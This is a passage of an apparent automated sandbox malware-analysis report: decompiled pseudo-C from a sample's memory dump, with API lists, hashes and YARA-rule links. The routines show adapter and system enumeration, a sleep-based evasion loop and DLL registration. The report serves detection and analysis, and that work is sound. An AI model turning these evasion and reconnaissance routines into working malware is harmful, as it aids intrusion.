					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E02002990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                                  0x020027bc
                                                                                                                                                                                                                                  0x020027bc
                                                                                                                                                                                                                                  0x020027bc
                                                                                                                                                                                                                                  0x020027bf
                                                                                                                                                                                                                                  0x020027c3
                                                                                                                                                                                                                                  0x020027c7
                                                                                                                                                                                                                                  0x020027cb
                                                                                                                                                                                                                                  0x020027d4
                                                                                                                                                                                                                                  0x020027d7
                                                                                                                                                                                                                                  0x020027e7
                                                                                                                                                                                                                                  0x020027ea
                                                                                                                                                                                                                                  0x020027fa
                                                                                                                                                                                                                                  0x02002800
                                                                                                                                                                                                                                  0x02002806
                                                                                                                                                                                                                                  0x0200285f
                                                                                                                                                                                                                                  0x0200285f
                                                                                                                                                                                                                                  0x02002876
                                                                                                                                                                                                                                  0x0200287b
                                                                                                                                                                                                                                  0x02002893
                                                                                                                                                                                                                                  0x02002893
                                                                                                                                                                                                                                  0x0200280f
                                                                                                                                                                                                                                  0x02002814
                                                                                                                                                                                                                                  0x0200281f
                                                                                                                                                                                                                                  0x0200282c
                                                                                                                                                                                                                                  0x0200282c
                                                                                                                                                                                                                                  0x0200282f
                                                                                                                                                                                                                                  0x02002835
                                                                                                                                                                                                                                  0x0200283b
                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                  0x02002842
                                                                                                                                                                                                                                  0x02002845
                                                                                                                                                                                                                                  0x02002849
                                                                                                                                                                                                                                  0x02002894
                                                                                                                                                                                                                                  0x02002897
                                                                                                                                                                                                                                  0x0200289e
                                                                                                                                                                                                                                  0x020028a9
                                                                                                                                                                                                                                  0x020028b5
                                                                                                                                                                                                                                  0x020028b7
                                                                                                                                                                                                                                  0x020028ba
                                                                                                                                                                                                                                  0x020028c1
                                                                                                                                                                                                                                  0x020028c8
                                                                                                                                                                                                                                  0x020028cd
                                                                                                                                                                                                                                  0x020028d0
                                                                                                                                                                                                                                  0x020028d0
                                                                                                                                                                                                                                  0x020028b5
                                                                                                                                                                                                                                  0x020028d7
                                                                                                                                                                                                                                  0x020028da
                                                                                                                                                                                                                                  0x020028df
                                                                                                                                                                                                                                  0x020028e8
                                                                                                                                                                                                                                  0x020028ed
                                                                                                                                                                                                                                  0x020028f6
                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                  0x020028fc
                                                                                                                                                                                                                                  0x0200284b
                                                                                                                                                                                                                                  0x02002854
                                                                                                                                                                                                                                  0x02002859
                                                                                                                                                                                                                                  0x02002859

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,02002CFE,?,?,00000003,020024A4), ref: 0200280F
                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,02002CFE,?,?,00000003,020024A4), ref: 02002845
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AdaptersInfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177971545-0
                                                                                                                                                                                                                                  • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                  • Instruction ID: 98ca419b1e88d683ec6cf79219cfb0a1de14be62befbd33b379d7ba4c51b2a56
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9331B035602B8099FB16DB61E888B99B7A0FB45F94F488125CF0D07BA5EF38C189C304
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 02001810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                  • Instruction ID: 7129f343dafa4689e080d4917027e595edc33761c9afacdcb01e5db724882af4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E71CD32300B8187FB65CF66E884BA977A1FB89B98F448125DF4A53B94DF38C555C710
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 020022DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LookupAccountNameW.ADVAPI32 ref: 0200233C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AccountLookupName
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1484870144-0
                                                                                                                                                                                                                                  • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                  • Instruction ID: f1f3afddf0afe6eda9b1ddb1395c0ac8c4cd104a0ceb1eed8e77074b937c024b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB316762701B418AFB159FB4E8C879933E4EB48B88F588136DE4D57A69EF38C148D340
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 02001678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(?,?,00000000,02002CB1,?,?,00000003,020024A4), ref: 020016CB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InformationQuerySystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3562636166-0
                                                                                                                                                                                                                                  • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                  • Instruction ID: 9eb112d38068bcfb26e296b5316e57cab4475779ebb4e3b0002cda8666e55288
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0218E35315B4083FB569B96A8C8769A2B2FB89BC5F084034EF0E57795EF3CE5459700
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 02002434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                                  			E02002434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E020011FC(_t73 - 0x29, _t52);
					_t37 = E0200153C(_t73 - 0x29);
					E02002C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E02001EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0200272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E02001FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E02002A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                                  0x02002434
                                                                                                                                                                                                                                  0x02002434
                                                                                                                                                                                                                                  0x02002434
                                                                                                                                                                                                                                  0x02002434
                                                                                                                                                                                                                                  0x02002434
                                                                                                                                                                                                                                  0x02002434
                                                                                                                                                                                                                                  0x02002434
                                                                                                                                                                                                                                  0x02002439
                                                                                                                                                                                                                                  0x0200243f
                                                                                                                                                                                                                                  0x0200244d
                                                                                                                                                                                                                                  0x0200244d
                                                                                                                                                                                                                                  0x0200244d
                                                                                                                                                                                                                                  0x02002512
                                                                                                                                                                                                                                  0x02002528
                                                                                                                                                                                                                                  0x02002450
                                                                                                                                                                                                                                  0x02002454
                                                                                                                                                                                                                                  0x02002456
                                                                                                                                                                                                                                  0x0200245a
                                                                                                                                                                                                                                  0x02002460
                                                                                                                                                                                                                                  0x02002468
                                                                                                                                                                                                                                  0x0200246e
                                                                                                                                                                                                                                  0x02002472
                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                  0x02002474
                                                                                                                                                                                                                                  0x02002482
                                                                                                                                                                                                                                  0x0200248c
                                                                                                                                                                                                                                  0x0200249d
                                                                                                                                                                                                                                  0x0200249f
                                                                                                                                                                                                                                  0x020024a4
                                                                                                                                                                                                                                  0x020024a7
                                                                                                                                                                                                                                  0x020024b0
                                                                                                                                                                                                                                  0x020024bf
                                                                                                                                                                                                                                  0x020024c1
                                                                                                                                                                                                                                  0x020024cc
                                                                                                                                                                                                                                  0x020024d2
                                                                                                                                                                                                                                  0x020024d7
                                                                                                                                                                                                                                  0x020024db
                                                                                                                                                                                                                                  0x020024e0
                                                                                                                                                                                                                                  0x020024e2
                                                                                                                                                                                                                                  0x020024f0
                                                                                                                                                                                                                                  0x020024f0
                                                                                                                                                                                                                                  0x020024fc
                                                                                                                                                                                                                                  0x02002501
                                                                                                                                                                                                                                  0x02002504
                                                                                                                                                                                                                                  0x0200250d
                                                                                                                                                                                                                                  0x0200250d
                                                                                                                                                                                                                                  0x02002504
                                                                                                                                                                                                                                  0x020024cc
                                                                                                                                                                                                                                  0x020024bf
                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                  0x020024a7

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                  • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                  • Instruction ID: 0ec82fd1bb530b202c21aab3a6f619dce6182b26ba4183c08a57e6317900e4cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A221AF32300B408AFB50DFB1E8D87ED63A2E748788F484426DE4D57698EF38D509D750
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                                  • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                                  • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                  • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                                  • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                                  • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                                  • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                  • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                  • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 020010AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 354099737-0
                                                                                                                                                                                                                                  • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                  • Instruction ID: d86b8d21c6e58c131ad44e2c24205eb6690fd7b0c20af583202d53292cc0b59c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4C08C30508380C2F35E6760E8CCF2C6274A300309F00061DC34B256E18F7C10C8C707
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                  • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                  • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0200260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,02001E13), ref: 0200264B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                                                                                  • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                  • Instruction ID: 7c1d85716f5b47643ce133dea38a29a0786cb7c65ab309fbe7e592bf72e79a25
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79E09222720741C2FF25EB20E8D87993361FB84704F844222894E026B0EF3CD65DCB00
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 02001000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                  • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                  • Instruction ID: cf0aaa59f325d145bf76a392495013d17d369eab9c21a45aacb70c11f66a6ba3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AD0A772E1034083F7309710EA9A7996351F394315F808206C58D44554CF7CC158C604
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: %
                                                                                                                                                                                                                                  • API String ID: 0-2567322570
                                                                                                                                                                                                                                  • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                  • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                  • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
